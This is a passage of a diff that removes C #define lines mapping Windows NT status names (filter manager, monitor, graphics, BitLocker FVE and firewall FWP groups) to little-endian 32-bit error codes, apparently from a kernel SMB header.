+-#define STATUS_LOG_APPENDED_FLUSH_FAILED cpu_to_le32(0xC01A002F)
+-#define STATUS_LOG_PINNED_RESERVATION cpu_to_le32(0xC01A0030)
+-#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC01B00EA)
+-#define STATUS_FLT_NO_HANDLER_DEFINED cpu_to_le32(0xC01C0001)
+-#define STATUS_FLT_CONTEXT_ALREADY_DEFINED cpu_to_le32(0xC01C0002)
+-#define STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST cpu_to_le32(0xC01C0003)
+-#define STATUS_FLT_DISALLOW_FAST_IO cpu_to_le32(0xC01C0004)
+-#define STATUS_FLT_INVALID_NAME_REQUEST cpu_to_le32(0xC01C0005)
+-#define STATUS_FLT_NOT_SAFE_TO_POST_OPERATION cpu_to_le32(0xC01C0006)
+-#define STATUS_FLT_NOT_INITIALIZED cpu_to_le32(0xC01C0007)
+-#define STATUS_FLT_FILTER_NOT_READY cpu_to_le32(0xC01C0008)
+-#define STATUS_FLT_POST_OPERATION_CLEANUP cpu_to_le32(0xC01C0009)
+-#define STATUS_FLT_INTERNAL_ERROR cpu_to_le32(0xC01C000A)
+-#define STATUS_FLT_DELETING_OBJECT cpu_to_le32(0xC01C000B)
+-#define STATUS_FLT_MUST_BE_NONPAGED_POOL cpu_to_le32(0xC01C000C)
+-#define STATUS_FLT_DUPLICATE_ENTRY cpu_to_le32(0xC01C000D)
+-#define STATUS_FLT_CBDQ_DISABLED cpu_to_le32(0xC01C000E)
+-#define STATUS_FLT_DO_NOT_ATTACH cpu_to_le32(0xC01C000F)
+-#define STATUS_FLT_DO_NOT_DETACH cpu_to_le32(0xC01C0010)
+-#define STATUS_FLT_INSTANCE_ALTITUDE_COLLISION cpu_to_le32(0xC01C0011)
+-#define STATUS_FLT_INSTANCE_NAME_COLLISION cpu_to_le32(0xC01C0012)
+-#define STATUS_FLT_FILTER_NOT_FOUND cpu_to_le32(0xC01C0013)
+-#define STATUS_FLT_VOLUME_NOT_FOUND cpu_to_le32(0xC01C0014)
+-#define STATUS_FLT_INSTANCE_NOT_FOUND cpu_to_le32(0xC01C0015)
+-#define STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND cpu_to_le32(0xC01C0016)
+-#define STATUS_FLT_INVALID_CONTEXT_REGISTRATION cpu_to_le32(0xC01C0017)
+-#define STATUS_FLT_NAME_CACHE_MISS cpu_to_le32(0xC01C0018)
+-#define STATUS_FLT_NO_DEVICE_OBJECT cpu_to_le32(0xC01C0019)
+-#define STATUS_FLT_VOLUME_ALREADY_MOUNTED cpu_to_le32(0xC01C001A)
+-#define STATUS_FLT_ALREADY_ENLISTED cpu_to_le32(0xC01C001B)
+-#define STATUS_FLT_CONTEXT_ALREADY_LINKED cpu_to_le32(0xC01C001C)
+-#define STATUS_FLT_NO_WAITER_FOR_REPLY cpu_to_le32(0xC01C0020)
+-#define STATUS_MONITOR_NO_DESCRIPTOR cpu_to_le32(0xC01D0001)
+-#define STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT cpu_to_le32(0xC01D0002)
+-#define STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM cpu_to_le32(0xC01D0003)
+-#define STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK cpu_to_le32(0xC01D0004)
+-#define STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED cpu_to_le32(0xC01D0005)
+-#define STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK	\
+-	cpu_to_le32(0xC01D0006)
+-#define STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK	\
+-	cpu_to_le32(0xC01D0007)
+-#define STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA cpu_to_le32(0xC01D0008)
+-#define STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK cpu_to_le32(0xC01D0009)
+-#define STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER cpu_to_le32(0xC01E0000)
+-#define STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER cpu_to_le32(0xC01E0001)
+-#define STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER cpu_to_le32(0xC01E0002)
+-#define STATUS_GRAPHICS_ADAPTER_WAS_RESET cpu_to_le32(0xC01E0003)
+-#define STATUS_GRAPHICS_INVALID_DRIVER_MODEL cpu_to_le32(0xC01E0004)
+-#define STATUS_GRAPHICS_PRESENT_MODE_CHANGED cpu_to_le32(0xC01E0005)
+-#define STATUS_GRAPHICS_PRESENT_OCCLUDED cpu_to_le32(0xC01E0006)
+-#define STATUS_GRAPHICS_PRESENT_DENIED cpu_to_le32(0xC01E0007)
+-#define STATUS_GRAPHICS_CANNOTCOLORCONVERT cpu_to_le32(0xC01E0008)
+-#define STATUS_GRAPHICS_NO_VIDEO_MEMORY cpu_to_le32(0xC01E0100)
+-#define STATUS_GRAPHICS_CANT_LOCK_MEMORY cpu_to_le32(0xC01E0101)
+-#define STATUS_GRAPHICS_ALLOCATION_BUSY cpu_to_le32(0xC01E0102)
+-#define STATUS_GRAPHICS_TOO_MANY_REFERENCES cpu_to_le32(0xC01E0103)
+-#define STATUS_GRAPHICS_TRY_AGAIN_LATER cpu_to_le32(0xC01E0104)
+-#define STATUS_GRAPHICS_TRY_AGAIN_NOW cpu_to_le32(0xC01E0105)
+-#define STATUS_GRAPHICS_ALLOCATION_INVALID cpu_to_le32(0xC01E0106)
+-#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE cpu_to_le32(0xC01E0107)
+-#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED cpu_to_le32(0xC01E0108)
+-#define STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION cpu_to_le32(0xC01E0109)
+-#define STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE cpu_to_le32(0xC01E0110)
+-#define STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION cpu_to_le32(0xC01E0111)
+-#define STATUS_GRAPHICS_ALLOCATION_CLOSED cpu_to_le32(0xC01E0112)
+-#define STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE cpu_to_le32(0xC01E0113)
+-#define STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE cpu_to_le32(0xC01E0114)
+-#define STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE cpu_to_le32(0xC01E0115)
+-#define STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST cpu_to_le32(0xC01E0116)
+-#define STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE cpu_to_le32(0xC01E0200)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0300)
+-#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED cpu_to_le32(0xC01E0301)
+-#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED	\
+-	cpu_to_le32(0xC01E0302)
+-#define STATUS_GRAPHICS_INVALID_VIDPN cpu_to_le32(0xC01E0303)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE cpu_to_le32(0xC01E0304)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET cpu_to_le32(0xC01E0305)
+-#define STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED cpu_to_le32(0xC01E0306)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET cpu_to_le32(0xC01E0308)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET cpu_to_le32(0xC01E0309)
+-#define STATUS_GRAPHICS_INVALID_FREQUENCY cpu_to_le32(0xC01E030A)
+-#define STATUS_GRAPHICS_INVALID_ACTIVE_REGION cpu_to_le32(0xC01E030B)
+-#define STATUS_GRAPHICS_INVALID_TOTAL_REGION cpu_to_le32(0xC01E030C)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE	\
+-	cpu_to_le32(0xC01E0310)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE	\
+-	cpu_to_le32(0xC01E0311)
+-#define STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET cpu_to_le32(0xC01E0312)
+-#define STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY cpu_to_le32(0xC01E0313)
+-#define STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET cpu_to_le32(0xC01E0314)
+-#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET cpu_to_le32(0xC01E0315)
+-#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET cpu_to_le32(0xC01E0316)
+-#define STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET cpu_to_le32(0xC01E0317)
+-#define STATUS_GRAPHICS_TARGET_ALREADY_IN_SET cpu_to_le32(0xC01E0318)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH cpu_to_le32(0xC01E0319)
+-#define STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY cpu_to_le32(0xC01E031A)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET	\
+-	cpu_to_le32(0xC01E031B)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE cpu_to_le32(0xC01E031C)
+-#define STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET cpu_to_le32(0xC01E031D)
+-#define STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET cpu_to_le32(0xC01E031F)
+-#define STATUS_GRAPHICS_STALE_MODESET cpu_to_le32(0xC01E0320)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET cpu_to_le32(0xC01E0321)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE cpu_to_le32(0xC01E0322)
+-#define STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN cpu_to_le32(0xC01E0323)
+-#define STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0324)
+-#define STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION	\
+-	cpu_to_le32(0xC01E0325)
+-#define STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES	\
+-	cpu_to_le32(0xC01E0326)
+-#define STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0327)
+-#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE	\
+-	cpu_to_le32(0xC01E0328)
+-#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET	\
+-	cpu_to_le32(0xC01E0329)
+-#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET cpu_to_le32(0xC01E032A)
+-#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR cpu_to_le32(0xC01E032B)
+-#define STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET cpu_to_le32(0xC01E032C)
+-#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET cpu_to_le32(0xC01E032D)
+-#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE	\
+-	cpu_to_le32(0xC01E032E)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE cpu_to_le32(0xC01E032F)
+-#define STATUS_GRAPHICS_RESOURCES_NOT_RELATED cpu_to_le32(0xC01E0330)
+-#define STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0331)
+-#define STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0332)
+-#define STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET cpu_to_le32(0xC01E0333)
+-#define STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER	\
+-	cpu_to_le32(0xC01E0334)
+-#define STATUS_GRAPHICS_NO_VIDPNMGR cpu_to_le32(0xC01E0335)
+-#define STATUS_GRAPHICS_NO_ACTIVE_VIDPN cpu_to_le32(0xC01E0336)
+-#define STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0337)
+-#define STATUS_GRAPHICS_MONITOR_NOT_CONNECTED cpu_to_le32(0xC01E0338)
+-#define STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0339)
+-#define STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE cpu_to_le32(0xC01E033A)
+-#define STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE cpu_to_le32(0xC01E033B)
+-#define STATUS_GRAPHICS_INVALID_STRIDE cpu_to_le32(0xC01E033C)
+-#define STATUS_GRAPHICS_INVALID_PIXELFORMAT cpu_to_le32(0xC01E033D)
+-#define STATUS_GRAPHICS_INVALID_COLORBASIS cpu_to_le32(0xC01E033E)
+-#define STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE cpu_to_le32(0xC01E033F)
+-#define STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0340)
+-#define STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT	\
+-	cpu_to_le32(0xC01E0341)
+-#define STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE cpu_to_le32(0xC01E0342)
+-#define STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN cpu_to_le32(0xC01E0343)
+-#define STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL cpu_to_le32(0xC01E0344)
+-#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION	\
+-	cpu_to_le32(0xC01E0345)
+-#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED \
+-	cpu_to_le32(0xC01E0346)
+-#define STATUS_GRAPHICS_INVALID_GAMMA_RAMP cpu_to_le32(0xC01E0347)
+-#define STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED cpu_to_le32(0xC01E0348)
+-#define STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED cpu_to_le32(0xC01E0349)
+-#define STATUS_GRAPHICS_MODE_NOT_IN_MODESET cpu_to_le32(0xC01E034A)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON	\
+-	cpu_to_le32(0xC01E034D)
+-#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE cpu_to_le32(0xC01E034E)
+-#define STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE cpu_to_le32(0xC01E034F)
+-#define STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS	\
+-	cpu_to_le32(0xC01E0350)
+-#define STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING cpu_to_le32(0xC01E0352)
+-#define STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED cpu_to_le32(0xC01E0353)
+-#define STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS cpu_to_le32(0xC01E0354)
+-#define STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT cpu_to_le32(0xC01E0355)
+-#define STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM cpu_to_le32(0xC01E0356)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN	\
+-	cpu_to_le32(0xC01E0357)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT	\
+-	cpu_to_le32(0xC01E0358)
+-#define STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED cpu_to_le32(0xC01E0359)
+-#define STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION	\
+-	cpu_to_le32(0xC01E035A)
+-#define STATUS_GRAPHICS_INVALID_CLIENT_TYPE cpu_to_le32(0xC01E035B)
+-#define STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET cpu_to_le32(0xC01E035C)
+-#define STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED	\
+-	cpu_to_le32(0xC01E0400)
+-#define STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED cpu_to_le32(0xC01E0401)
+-#define STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER cpu_to_le32(0xC01E0430)
+-#define STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED cpu_to_le32(0xC01E0431)
+-#define STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED cpu_to_le32(0xC01E0432)
+-#define STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY cpu_to_le32(0xC01E0433)
+-#define STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED cpu_to_le32(0xC01E0434)
+-#define STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON cpu_to_le32(0xC01E0435)
+-#define STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE cpu_to_le32(0xC01E0436)
+-#define STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER cpu_to_le32(0xC01E0438)
+-#define STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED cpu_to_le32(0xC01E043B)
+-#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS \
+-	cpu_to_le32(0xC01E051C)
+-#define STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST cpu_to_le32(0xC01E051D)
+-#define STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC01E051E)
+-#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS \
+-	cpu_to_le32(0xC01E051F)
+-#define STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED cpu_to_le32(0xC01E0520)
+-#define STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST	\
+-	cpu_to_le32(0xC01E0521)
+-#define STATUS_GRAPHICS_OPM_NOT_SUPPORTED cpu_to_le32(0xC01E0500)
+-#define STATUS_GRAPHICS_COPP_NOT_SUPPORTED cpu_to_le32(0xC01E0501)
+-#define STATUS_GRAPHICS_UAB_NOT_SUPPORTED cpu_to_le32(0xC01E0502)
+-#define STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS cpu_to_le32(0xC01E0503)
+-#define STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E0504)
+-#define STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST cpu_to_le32(0xC01E0505)
+-#define STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME	\
+-	cpu_to_le32(0xC01E0506)
+-#define STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP	\
+-	cpu_to_le32(0xC01E0507)
+-#define STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED	\
+-	cpu_to_le32(0xC01E0508)
+-#define STATUS_GRAPHICS_OPM_INVALID_POINTER cpu_to_le32(0xC01E050A)
+-#define STATUS_GRAPHICS_OPM_INTERNAL_ERROR cpu_to_le32(0xC01E050B)
+-#define STATUS_GRAPHICS_OPM_INVALID_HANDLE cpu_to_le32(0xC01E050C)
+-#define STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE	\
+-	cpu_to_le32(0xC01E050D)
+-#define STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH cpu_to_le32(0xC01E050E)
+-#define STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED cpu_to_le32(0xC01E050F)
+-#define STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED cpu_to_le32(0xC01E0510)
+-#define STATUS_GRAPHICS_PVP_HFS_FAILED cpu_to_le32(0xC01E0511)
+-#define STATUS_GRAPHICS_OPM_INVALID_SRM cpu_to_le32(0xC01E0512)
+-#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP cpu_to_le32(0xC01E0513)
+-#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP cpu_to_le32(0xC01E0514)
+-#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA	\
+-	cpu_to_le32(0xC01E0515)
+-#define STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET cpu_to_le32(0xC01E0516)
+-#define STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH cpu_to_le32(0xC01E0517)
+-#define STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE	\
+-	cpu_to_le32(0xC01E0518)
+-#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS	\
+-	cpu_to_le32(0xC01E051A)
+-#define STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS	\
+-	cpu_to_le32(0xC01E051B)
+-#define STATUS_GRAPHICS_I2C_NOT_SUPPORTED cpu_to_le32(0xC01E0580)
+-#define STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC01E0581)
+-#define STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA cpu_to_le32(0xC01E0582)
+-#define STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA cpu_to_le32(0xC01E0583)
+-#define STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED cpu_to_le32(0xC01E0584)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_DATA cpu_to_le32(0xC01E0585)
+-#define STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE \
+-	cpu_to_le32(0xC01E0586)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING	\
+-	cpu_to_le32(0xC01E0587)
+-#define STATUS_GRAPHICS_MCA_INTERNAL_ERROR cpu_to_le32(0xC01E0588)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND cpu_to_le32(0xC01E0589)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH cpu_to_le32(0xC01E058A)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM cpu_to_le32(0xC01E058B)
+-#define STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE cpu_to_le32(0xC01E058C)
+-#define STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS cpu_to_le32(0xC01E058D)
+-#define STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED cpu_to_le32(0xC01E05E0)
+-#define STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME	\
+-	cpu_to_le32(0xC01E05E1)
+-#define STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP	\
+-	cpu_to_le32(0xC01E05E2)
+-#define STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED cpu_to_le32(0xC01E05E3)
+-#define STATUS_GRAPHICS_INVALID_POINTER cpu_to_le32(0xC01E05E4)
+-#define STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE	\
+-	cpu_to_le32(0xC01E05E5)
+-#define STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E05E6)
+-#define STATUS_GRAPHICS_INTERNAL_ERROR cpu_to_le32(0xC01E05E7)
+-#define STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS cpu_to_le32(0xC01E05E8)
+-#define STATUS_FVE_LOCKED_VOLUME cpu_to_le32(0xC0210000)
+-#define STATUS_FVE_NOT_ENCRYPTED cpu_to_le32(0xC0210001)
+-#define STATUS_FVE_BAD_INFORMATION cpu_to_le32(0xC0210002)
+-#define STATUS_FVE_TOO_SMALL cpu_to_le32(0xC0210003)
+-#define STATUS_FVE_FAILED_WRONG_FS cpu_to_le32(0xC0210004)
+-#define STATUS_FVE_FAILED_BAD_FS cpu_to_le32(0xC0210005)
+-#define STATUS_FVE_FS_NOT_EXTENDED cpu_to_le32(0xC0210006)
+-#define STATUS_FVE_FS_MOUNTED cpu_to_le32(0xC0210007)
+-#define STATUS_FVE_NO_LICENSE cpu_to_le32(0xC0210008)
+-#define STATUS_FVE_ACTION_NOT_ALLOWED cpu_to_le32(0xC0210009)
+-#define STATUS_FVE_BAD_DATA cpu_to_le32(0xC021000A)
+-#define STATUS_FVE_VOLUME_NOT_BOUND cpu_to_le32(0xC021000B)
+-#define STATUS_FVE_NOT_DATA_VOLUME cpu_to_le32(0xC021000C)
+-#define STATUS_FVE_CONV_READ_ERROR cpu_to_le32(0xC021000D)
+-#define STATUS_FVE_CONV_WRITE_ERROR cpu_to_le32(0xC021000E)
+-#define STATUS_FVE_OVERLAPPED_UPDATE cpu_to_le32(0xC021000F)
+-#define STATUS_FVE_FAILED_SECTOR_SIZE cpu_to_le32(0xC0210010)
+-#define STATUS_FVE_FAILED_AUTHENTICATION cpu_to_le32(0xC0210011)
+-#define STATUS_FVE_NOT_OS_VOLUME cpu_to_le32(0xC0210012)
+-#define STATUS_FVE_KEYFILE_NOT_FOUND cpu_to_le32(0xC0210013)
+-#define STATUS_FVE_KEYFILE_INVALID cpu_to_le32(0xC0210014)
+-#define STATUS_FVE_KEYFILE_NO_VMK cpu_to_le32(0xC0210015)
+-#define STATUS_FVE_TPM_DISABLED cpu_to_le32(0xC0210016)
+-#define STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO cpu_to_le32(0xC0210017)
+-#define STATUS_FVE_TPM_INVALID_PCR cpu_to_le32(0xC0210018)
+-#define STATUS_FVE_TPM_NO_VMK cpu_to_le32(0xC0210019)
+-#define STATUS_FVE_PIN_INVALID cpu_to_le32(0xC021001A)
+-#define STATUS_FVE_AUTH_INVALID_APPLICATION cpu_to_le32(0xC021001B)
+-#define STATUS_FVE_AUTH_INVALID_CONFIG cpu_to_le32(0xC021001C)
+-#define STATUS_FVE_DEBUGGER_ENABLED cpu_to_le32(0xC021001D)
+-#define STATUS_FVE_DRY_RUN_FAILED cpu_to_le32(0xC021001E)
+-#define STATUS_FVE_BAD_METADATA_POINTER cpu_to_le32(0xC021001F)
+-#define STATUS_FVE_OLD_METADATA_COPY cpu_to_le32(0xC0210020)
+-#define STATUS_FVE_REBOOT_REQUIRED cpu_to_le32(0xC0210021)
+-#define STATUS_FVE_RAW_ACCESS cpu_to_le32(0xC0210022)
+-#define STATUS_FVE_RAW_BLOCKED cpu_to_le32(0xC0210023)
+-#define STATUS_FWP_CALLOUT_NOT_FOUND cpu_to_le32(0xC0220001)
+-#define STATUS_FWP_CONDITION_NOT_FOUND cpu_to_le32(0xC0220002)
+-#define STATUS_FWP_FILTER_NOT_FOUND cpu_to_le32(0xC0220003)
+-#define STATUS_FWP_LAYER_NOT_FOUND cpu_to_le32(0xC0220004)
+-#define STATUS_FWP_PROVIDER_NOT_FOUND cpu_to_le32(0xC0220005)
+-#define STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND cpu_to_le32(0xC0220006)
+-#define STATUS_FWP_SUBLAYER_NOT_FOUND cpu_to_le32(0xC0220007)
+-#define STATUS_FWP_NOT_FOUND cpu_to_le32(0xC0220008)
+-#define STATUS_FWP_ALREADY_EXISTS cpu_to_le32(0xC0220009)
+-#define STATUS_FWP_IN_USE cpu_to_le32(0xC022000A)
+-#define STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS cpu_to_le32(0xC022000B)
+-#define STATUS_FWP_WRONG_SESSION cpu_to_le32(0xC022000C)
+-#define STATUS_FWP_NO_TXN_IN_PROGRESS cpu_to_le32(0xC022000D)
+-#define STATUS_FWP_TXN_IN_PROGRESS cpu_to_le32(0xC022000E)
+-#define STATUS_FWP_TXN_ABORTED cpu_to_le32(0xC022000F)
+-#define STATUS_FWP_SESSION_ABORTED cpu_to_le32(0xC0220010)
+-#define STATUS_FWP_INCOMPATIBLE_TXN cpu_to_le32(0xC0220011)
+-#define STATUS_FWP_TIMEOUT cpu_to_le32(0xC0220012)
+-#define STATUS_FWP_NET_EVENTS_DISABLED cpu_to_le32(0xC0220013)
+-#define STATUS_FWP_INCOMPATIBLE_LAYER cpu_to_le32(0xC0220014)
+-#define STATUS_FWP_KM_CLIENTS_ONLY cpu_to_le32(0xC0220015)
+-#define STATUS_FWP_LIFETIME_MISMATCH cpu_to_le32(0xC0220016)
+-#define STATUS_FWP_BUILTIN_OBJECT cpu_to_le32(0xC0220017)
+-#define STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS cpu_to_le32(0xC0220018)
+-#define STATUS_FWP_TOO_MANY_CALLOUTS cpu_to_le32(0xC0220018)
+-#define STATUS_FWP_NOTIFICATION_DROPPED cpu_to_le32(0xC0220019)
+-#define STATUS_FWP_TRAFFIC_MISMATCH cpu_to_le32(0xC022001A)
+-#define STATUS_FWP_INCOMPATIBLE_SA_STATE cpu_to_le32(0xC022001B)
+-#define STATUS_FWP_NULL_POINTER cpu_to_le32(0xC022001C)
